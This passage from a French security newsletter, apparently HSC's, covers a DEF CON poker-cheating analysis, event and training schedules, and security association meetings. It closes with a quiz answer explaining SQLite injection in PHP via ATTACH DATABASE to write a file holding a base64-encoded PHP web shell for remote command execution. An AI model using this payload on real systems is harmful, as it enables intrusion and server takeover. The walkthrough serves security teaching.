 Les conférenciers expliquent ensuite leur analyse de ce kit de triche présent
 en Chine. Celui-ci utilise en fait la caméra du téléphone pour lire un
 code-barre infrarouge présent sur les côtés des cartes modifiées.
 Le système présenté est bien conçu et tout ce processus apporte la preuve d'une
 industrialisation de ce type de kit avec des oreillettes en option pour
 être plus discret. Le téléphone quant à lui est doté d'un firmware modifié et
 protégé afin que seule la personne qui l'achète puisse l'utiliser.
 Une fois ce téléphone en leur possession, l'équipe a pu trouver le mot de passe
 trivial d'un accès dérobé et ainsi analyser plus en profondeur les
 fonctionnalités proposées.

 https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Bursztein-Picod-Cheating-at-Poker-James-Bond-Style-UPDATED.pdf




--[ 8. Rencontrez HSC lors des prochaines expositions et conférences ]-----

     HSC sera présent les 21 et 22 septembre aux Rencontres Sécurité
 organisées par Excelium à Mondorf-les-Bains au Luxembourg.
 Venez nous rencontrer sur notre stand, Cécile Schauer et Hervé Schauer
 seront à votre disposition, avec notre catalogue de formation.
 Hervé Schauer participera à la table-ronde sur la formation en sécurité
 le 22 septembre. Entrée gratuite.
 http://rencontressecurite.excellium.lu

     Hervé Schauer participera aux tables-rondes le 23 septembre sur
 la fragilité de l'internet des objets connectés et l'industrie de la
 sécurité au Cyber at hack organisé par l'Epitech et Itrust à Toulouse.
 Hervé Schauer sera à votre disposition pour vos questions avec des
 catalogues de formation. Entrée gratuite.
 https://www.cyberathack.com/

     Hervé Schauer fera une conférence le 4 octobre dans la session PME/TPE
 de Microsoft Expérience, le nouveau nom des Tech Days Microsoft.
 Provitez-en pour venir le rencontrer au Palais des Congrès de Paris à
 la Porte Maillot. Entrée gratuite.
 Programme : https://experiences.microsoft.fr/Event/Business
 Inscription : https://event.inwink.com/microsoftexperiences2016/inscription

     Hervé Schauer sera présent sur le stand Deloitte aux Assises de la
 Sécurité du 5 au 8 octobre à Monaco, avec des catalogues de formation,
 et sera à votre disposition pour répondre à toutes vos questions.
 Entrée sur invitation uniquement.
 https://www.lesassisesdelasecurite.com/

     HSC sera présent sur le stand d'ISC2 lors de la conférence 2016
 de l'ISSE (Information Security Solutions Europe), la grande conférence
 européenne en sécurité sous le patronnage de l'Union Européenne, qui se
 déroule cette année à Paris les 15 et 16 novembre chez Microsoft à
 Issy-les-Moulineaux. Entrée payante.
 http://www.isse.eu.com/

     HSC sera présent sur le stand Deloitte au FIC les 24 et 25 janvier à
 Lille au Grand Palais. Hervé Schauer et Lynda Benchikh seront à votre
 disposition avec notre catalogue de formation. Entrée gratuite.
 https://www.forum-fic.com/

     HSC sera présent avec un stand à l'Université des CIL organisée par
 l'AFCDP le 25 janvier 2017 à la Maison de la Chimie à Paris. Frédéric
 Connes, Amélie Paget, Jean Chérin, et Emilie Bozzolo seront à votre
 disposition avec notre catalogue de formation.
 Entrée payante. Inscriptions pas encore ouvertes.
 http://www.afcdp.net/

     HSC sera présent avec aux GS-DAYS le 28 mars à l'espace Saint-Martin à
 Paris avec un stand.
 Entrée payante. Inscriptions pas encore ouvertes.
 http://www.gsdays.fr/

     Enfin, Deloitte hébergera dans l'auditorium de Neuilly-sur-Seine la
 conférence SecureFrance organisée par ISC2 le 19 avril 2017.
 Entrée gratuite pour les titulaires du CISSP. Réservez votre date.



--[ 9. Agenda des interventions publiques ]--------------------------------

 - 13 septembre - Réunion de l'OSSIR - Paris, ENSAM, à 14h00
   "Compte-rendu des conférences Blackhat et DEFCON" par Matthieu
   Schipman et Baptiste Dolbeau
   http://www.ossir.org/

 - 22 septembre - Rencontres Sécurité - Mondorf-les-Bains, Luxembourg, à 9h00
   Table-ronde "Métiers de la cybersécurité et de la gestion des risques,
   de l'université aux formations certifiantes"
   Participation d'Hervé Schauer
   http://rencontressecurite.excellium.lu

 - 23 septembre - Cyberh at ack - Toulouse, Epitech, à 12h00
   Table ronde "Internet des objets connectés, nouvelle fragilité"
   Participation d'Hervé Schauer
   https://www.cyberathack.com/conferences/

 - 4 octobre - Microsoft Experience 2016 (anciennement les TechDays) -
   Paris, Palais des Congrès Porte Maillot
   "Les 5 règles d'or de la sécurité informatique pour bien protéger sa
   TPE/PME !" par Hervé Schauer
   https://experiences.microsoft.fr/Event/Business

 - 21 octobre  - FNAF 2016 Forum des Associations - Paris, Palais des
   Congrès Porte Maillot
   "Se protéger de la cybercriminalité" par Hervé Schauer, associé Deloitte
   http://www.forumdesassociations.com/

 - 25 janvier 2017 - Université AFCDP des CIL - Paris, Maison de la Chimie
   "Le Délégué à la protection des données responsable pénalement ?"
   par Frédéric Connes
   http://www.afcdp.net/



--[ 10. Prochaines formations HSC ]----------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        Essentiels techniques de la SSI    .....    : 12 et 13 septembre
        Protéger les applis web (DEV522 /GIAC GWEB) : 12 au 16 septembre (*)(#)
        ISO 27005 Risk Manager    ..............    : 14 au 16 septembre (#)(C)
        Sécurité du Cloud Computing    .........    : 19 au 21 septembre
        ISO 27001 Lead Implementer    ..........    : 19 au 23 septembre (#)(C)
        Inforensique Windows (SANS FOR408/GIAC GCFE): 19 au 23 septembre (*)(#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 26 au 30 septembre (*)(#)
        ISO 27001 Lead Auditor    ..............    : 26 au 30 septembre (#)
        Correspondant Informatique et Libertés      : 28 au 30 septembre (@)
        ISO 27005 Risk Manager    ..............    : 3 au 5 octobre (#)
        Formation RSSI    ......................    : 3 au 7 octobre
        Inforensique réseau avancée (SANS FOR572)   : 3 au 7 octobre (*)(#)
        Anticiper le règlement européen    .....    : 7 octobre
        Techniques de hacking, exploitation de failles
        et gestion des incidents (SEC504/GCIH)      : 10 au 14 octobre (*)(#)
        Préparation au CISA    .................    : 10 au 14 octobre (#)
        ISO 22301 Lead Implementer    ..........    : 10 au 14 octobre (#)
        Essentiel de PCI-DSS 3.2   .............    : 11 octobre
        Tests d'intrusion des applications web et
        hacking éthique (SANS SEC542 / GIAC GWAPT)  : 17 au 21 octobre (#)
        Formation CISSP    .....................    : 17 au 21 octobre (#)
        ISO 27001 Lead Implementer    ..........    : 17 au 21 octobre (#)
        Privacy Lead Implementer    ............    : 24 au 28 octobre (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 24 au 29 octobre (*)(#)
        Sécurité SCADA    ......................    : 2 au 4 novembre (*)
        Essentiels Informatique et Liberté   ...    : 4 novembre
        Sécurité du WiFi    ....................    : 7 et 8 novembre (*)
        EBIOS Risk Manager    ..................    : 7 au 9 novembre (#)
        DNSSEC    ..............................    : 9 et 10 novembre (*)
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 14 au 18 novembre (*)(#)
        ISO 27005 Risk Manager    ..............    : 14 au 16 novembre (#)
        PSSIE & RGS v2   .......................    : 18 novembre
        ISO 27001 Lead Implementer    ..........    : 21 au 25 novembre (#)
        Expert Sécurité Linux LPI 303   ........    : 21 au 25 novembre (*)(#)
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 21 au 25 novembre (*)
        ISO 27001 Lead Auditor    ..............    : 28 novembre au 2 déc. (#)
        Tests d'intrusion avancés, exploitation de
        failles et hacking éthique (SEC660/GXPN)    : 28 novembre au 3 déc(*)(#)
        Droit de la sécurité informatique    ...    : 1 et 2 décembre
        Mesures de sécurité ISO 27002:2013   ...    : 5 et 6 décembre
        Indicateurs & tableaux de bord SSI/ISO27004 : 7 décembre
        Gestion des incidents de sécurité/ISO27035  : 8 décembre
        Gestion de crise IT/SSI    .............    : 9 décembre
        ISO 27005 Risk Manager    ..............    : 12 au 14 décembre (#)
        Gestion des risques avancée    .........    : 15 et 16 décembre
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 12 au 16 décembre (*)(#)
        Formation RPCA    ......................    : 27 février au 3 mars
        Essentiels de l'ISO22301    ............    : 20 mars
        Sécurité des nouveaux usages   .........    : 3 avril
        ISO 22301 Lead Auditor    ..............    : 24 au 28 avril (#)
        PKI : principes et mise en oeuvre    ...    : 22 au 24 mai (*)
        Outils et techniques d'analyse
        (SANS FOR610/GIAC GREM)   ..............    : 12 au 16 juin (*)
        Supervision, surveillance et détection
        d'intrusion (SANS SEC511 / GIAC GMON)       : 26 au 30 juin (*)(#)
        Inforensique ordiphones/tablettes (FOR585)  : 25 au 29 septembre (*)(#)

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC, LPI ou ISACA
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        Anticiper le règlement européen    .....    : 28 avril
        ISO 27005 Risk Manager    ..............    : 26 au 28 juin (#)
        ISO 27001 Lead Implementer    ..........    : nous consulter (#)
        ISO 22301 Lead Implementer    ..........    : nous consulter (#)
        Formation CISSP    .....................    : nous consulter (#)

 - Marseille
        Correspondant Informatique et Libertés .    : 19 au 21 avril (@)

 - Toulouse
        ISO 27005 Risk Manager    ..............    : 10 au 12 mai (#)
        ISO 27001 Lead Implementer    ..........    : 16 au 20 octobre 2017 (#)
        Correspondant Informatique et Libertés .    : 20 au 22 novembre 2017 (@)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 141 409 704 ou standard +33 141 409 700

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2016 en PDF sur http://www.hsc-formation.fr/



--[ 11. Actualité des associations : Club 27001, OSSIR et Clusif ]--------

  o Club 27001 (http://www.club-27001.fr/)
     . Assemblée Générale annuelle du Club 27001 : date annoncée dans la liste
       électronique prochainement
     . Prochaine réunion à Paris jeudi 20 octobre à 14h00
         - "Présentation de Netwrix Auditor" par Pierre-Louis Lussan
       (Netwrix)
         - "La Déclaration d'Applicabilité" par Béatrice Joucreau
       (HSC by Deloitte)
         - Points divers
     . Réunion suivante à Paris jeudi 19 janvier 2017
         - "La série des normes sur la vie privée ISO29000"
     . Conférence annuelle à Paris le mardi 28 mars 2017
       Réservez votre date !
     . Prochaine réunion à Lyon jeudi 29 septembre à 9h00 chez Ciril
         - "Comment traduire l'annexe A en mesures concrètes" par Jean-François
       Mahé (APICIL) et Malick Fall (Polaris ST)
         - "Gestion des risques : différentes méthodes, outils, et ISO27001"
       par Philippe Dubourg (CIRTIL) et Simon Deterre (Lexsi)
         - Points divers
     . Réunion suivante à Lyon le jeudi 15 décembre
         - "Indicateurs et ISO 27018/ ISO27017" par Fidens et BSI
         - Points divers
     . Inscrivez-vous à la liste du club à Lyon
       http://www.club-27001.fr/mailman/listinfo/club-27001-lyon
     . Prochaine réunion à Toulouse le 16 septembre à 13h45 à la CARSAT
         - "Point sur l'évolution des normes" par Claire Albouy-Cossard
       (CNAM-TS)
         - "ISO-IEC 27001 et/ou ISO 22301 : divergences et convergences entre
           un SMSI et un SMCA" par Gilles Trouessin (Accesssif)
         - Discussion sur l'implémentation du chapitre A6.2 "Appareils
           mobiles et télétravail" animée par Jacques Sudres (C-S)
         - Points divers
     . Autres prochaines réunions annoncées sur www.club-27001.fr et dans
       les listes électroniques.
       Inscrivez-vous sur les listes de chaque ville sur www.club-27001.fr
       pour suivre l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 13 septembre à 14h
         - "Surveillance continue et adaptative Elastic Detector" par Frédéric
           Donnat (Elastic Search)
         - "Compte-rendu des conférences Blackhat et DEFCON" par Matthieu
       Schipman et Baptiste Dolbeau (HSC)
         - Revue de vulnérabilités
     . Réunion suivante à Paris le mardi 11 octobre
         - "Anti-virus Armadito" par François Dechelle et Valentin Hamon
       (Teclib)
         - Seconde présentation en cours de confirmation
         - Revue de vulnérabilités
     . Prochaine réunion à Toulouse en septembre ou octobre
     . Prochaine réunion à Rennes jeudi 15 septembre

 o Clusif (http://www.clusif.fr/)
     . Prochaine conférence mercredi 19 octobre à 16h00 à la CCI place de la
       Bourse sur la gestion des accès
       Appel à communications ici : https://clusif.fr/call-for-paper/
       Réponses avant le 23 septembre
     . Conférence suivante mercredi 7 décembre à 16h00 à la CCI place de la
       Bourse sur la sécurité SCADA
         - Nouvelle version des fiches de lecture du panorama des documents
       liés à la sécurité des systèmes d'information industriels
         - Présentation des incidents liés à la sécurité industrielle
       https://www.clusif.asso.fr/fr/infos/event/

 o ISSA France
     . Prochain afterworks mardi 20 septembre
         - Sujet pas encore fixé, ou confidentiel...
       http://securitytuesday.com/



--[ 12. Le saviez-vous ? La réponse ]-------------------------------------

     Dans un premier temps, il faut se souvenir du format de stockage des
 bases de données SQLite.
 Celle-ci est représentée sous la forme d'un fichier binaire unique tel que
 défini dans la documentation [1], ce qui a poussé son utilisation sur les
 systèmes mobiles.

 Maintenant que nous savons cela, nous allons exploiter l'injection de code
 SQL situé à cette ligne:
 $db->exec("INSERT INTO users(username, password) VALUES('".$username."','".$password."')");

 En effet, l'utilisateur contrôlant à la fois les variables $username et
 $password, il lui est possible d'injecter des commandes SQL arbitraires en
 définissant les variables de la manière suivante :
    $_POST['username'] = "HSC";
    $_POST['pwd'] = "mdp');[PAYLOAD_SQL]; -- "

 Nous avons maintenant la possibilité d'exécuter des instructions SQL
 arbitraires, cependant SQLite ne possède pas de méthode type "dumpfile"[2]
 (MySQL) ou "COPY"[3] (PostgreSQL). Malgré cela, il existe la méthode
 "ATTACH DATABASE" [4] qui permet d'ajouter une autre base de données à la
 source de données. L'avantage de cela est que si la base de données n'existait
 pas auparavant, celle-ci sera automatiquement créée et un fichier sera donc
 créé sur le système de fichier.

  PAYLOAD_SQL = "ATTACH DATABASE '[path]/[fichier].php' AS shell";

 Une fois la nouvelle base attachée (dénommée shell afin de s'assurer que les
 futures instructions soient exécutées sur cette base et pas sur site.db), nous
 créons une nouvelle table SQL afin de pouvoir insérer du contenu par la suite
 qui contiendra notre webshell.

  PAYLOAD_SQL += "CREATE TABLE shell.[random_name] ([random_name2] text);"

 Cette instruction permet de créer une table [random_name] avec un seul champ
 au format "text", ce qui est implique que le contenu affiché sera en clair
 dans le fichier [fichier.php].

 Enfin, nous ajoutons du contenu dans cette table:
   PAYLOAD += "INSERT INTO shell.[random_name] ([random_name2]) VALUES ('<?php eval(base64_decode("ZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTs="));?>'); --

 Finalement, une fois la payload exécutée, nous avons sur le système de fichier
 un nouveau fichier dénommé [fichier].php correspondant à la base de données
 SQLite nouvellement crée. Et grâce au fonctionnement nominal des moteurs
 d'interprétations PHP, celui-ci va interpréter le contenu du fichier de notre
 base de données SQLite et plus particulièrement le code présent entre les
 chaines "<?php" et "?>".

 Il est alors possible d'exécuter des commandes arbitraires sur le système en
 faisant appel à l'URL: http://www.victim.com/[fichier].php?cmd=[COMMANDE]

 [1] https://www.sqlite.org/fileformat2.html
 [2] http://dev.mysql.com/doc/refman/5.7/en/select-into.html
 [3] https://www.postgresql.org/docs/current/static/sql-copy.html
 [4] https://www.sqlite.org/lang_attach.html



Plus d'informations sur la liste de diffusion newsletter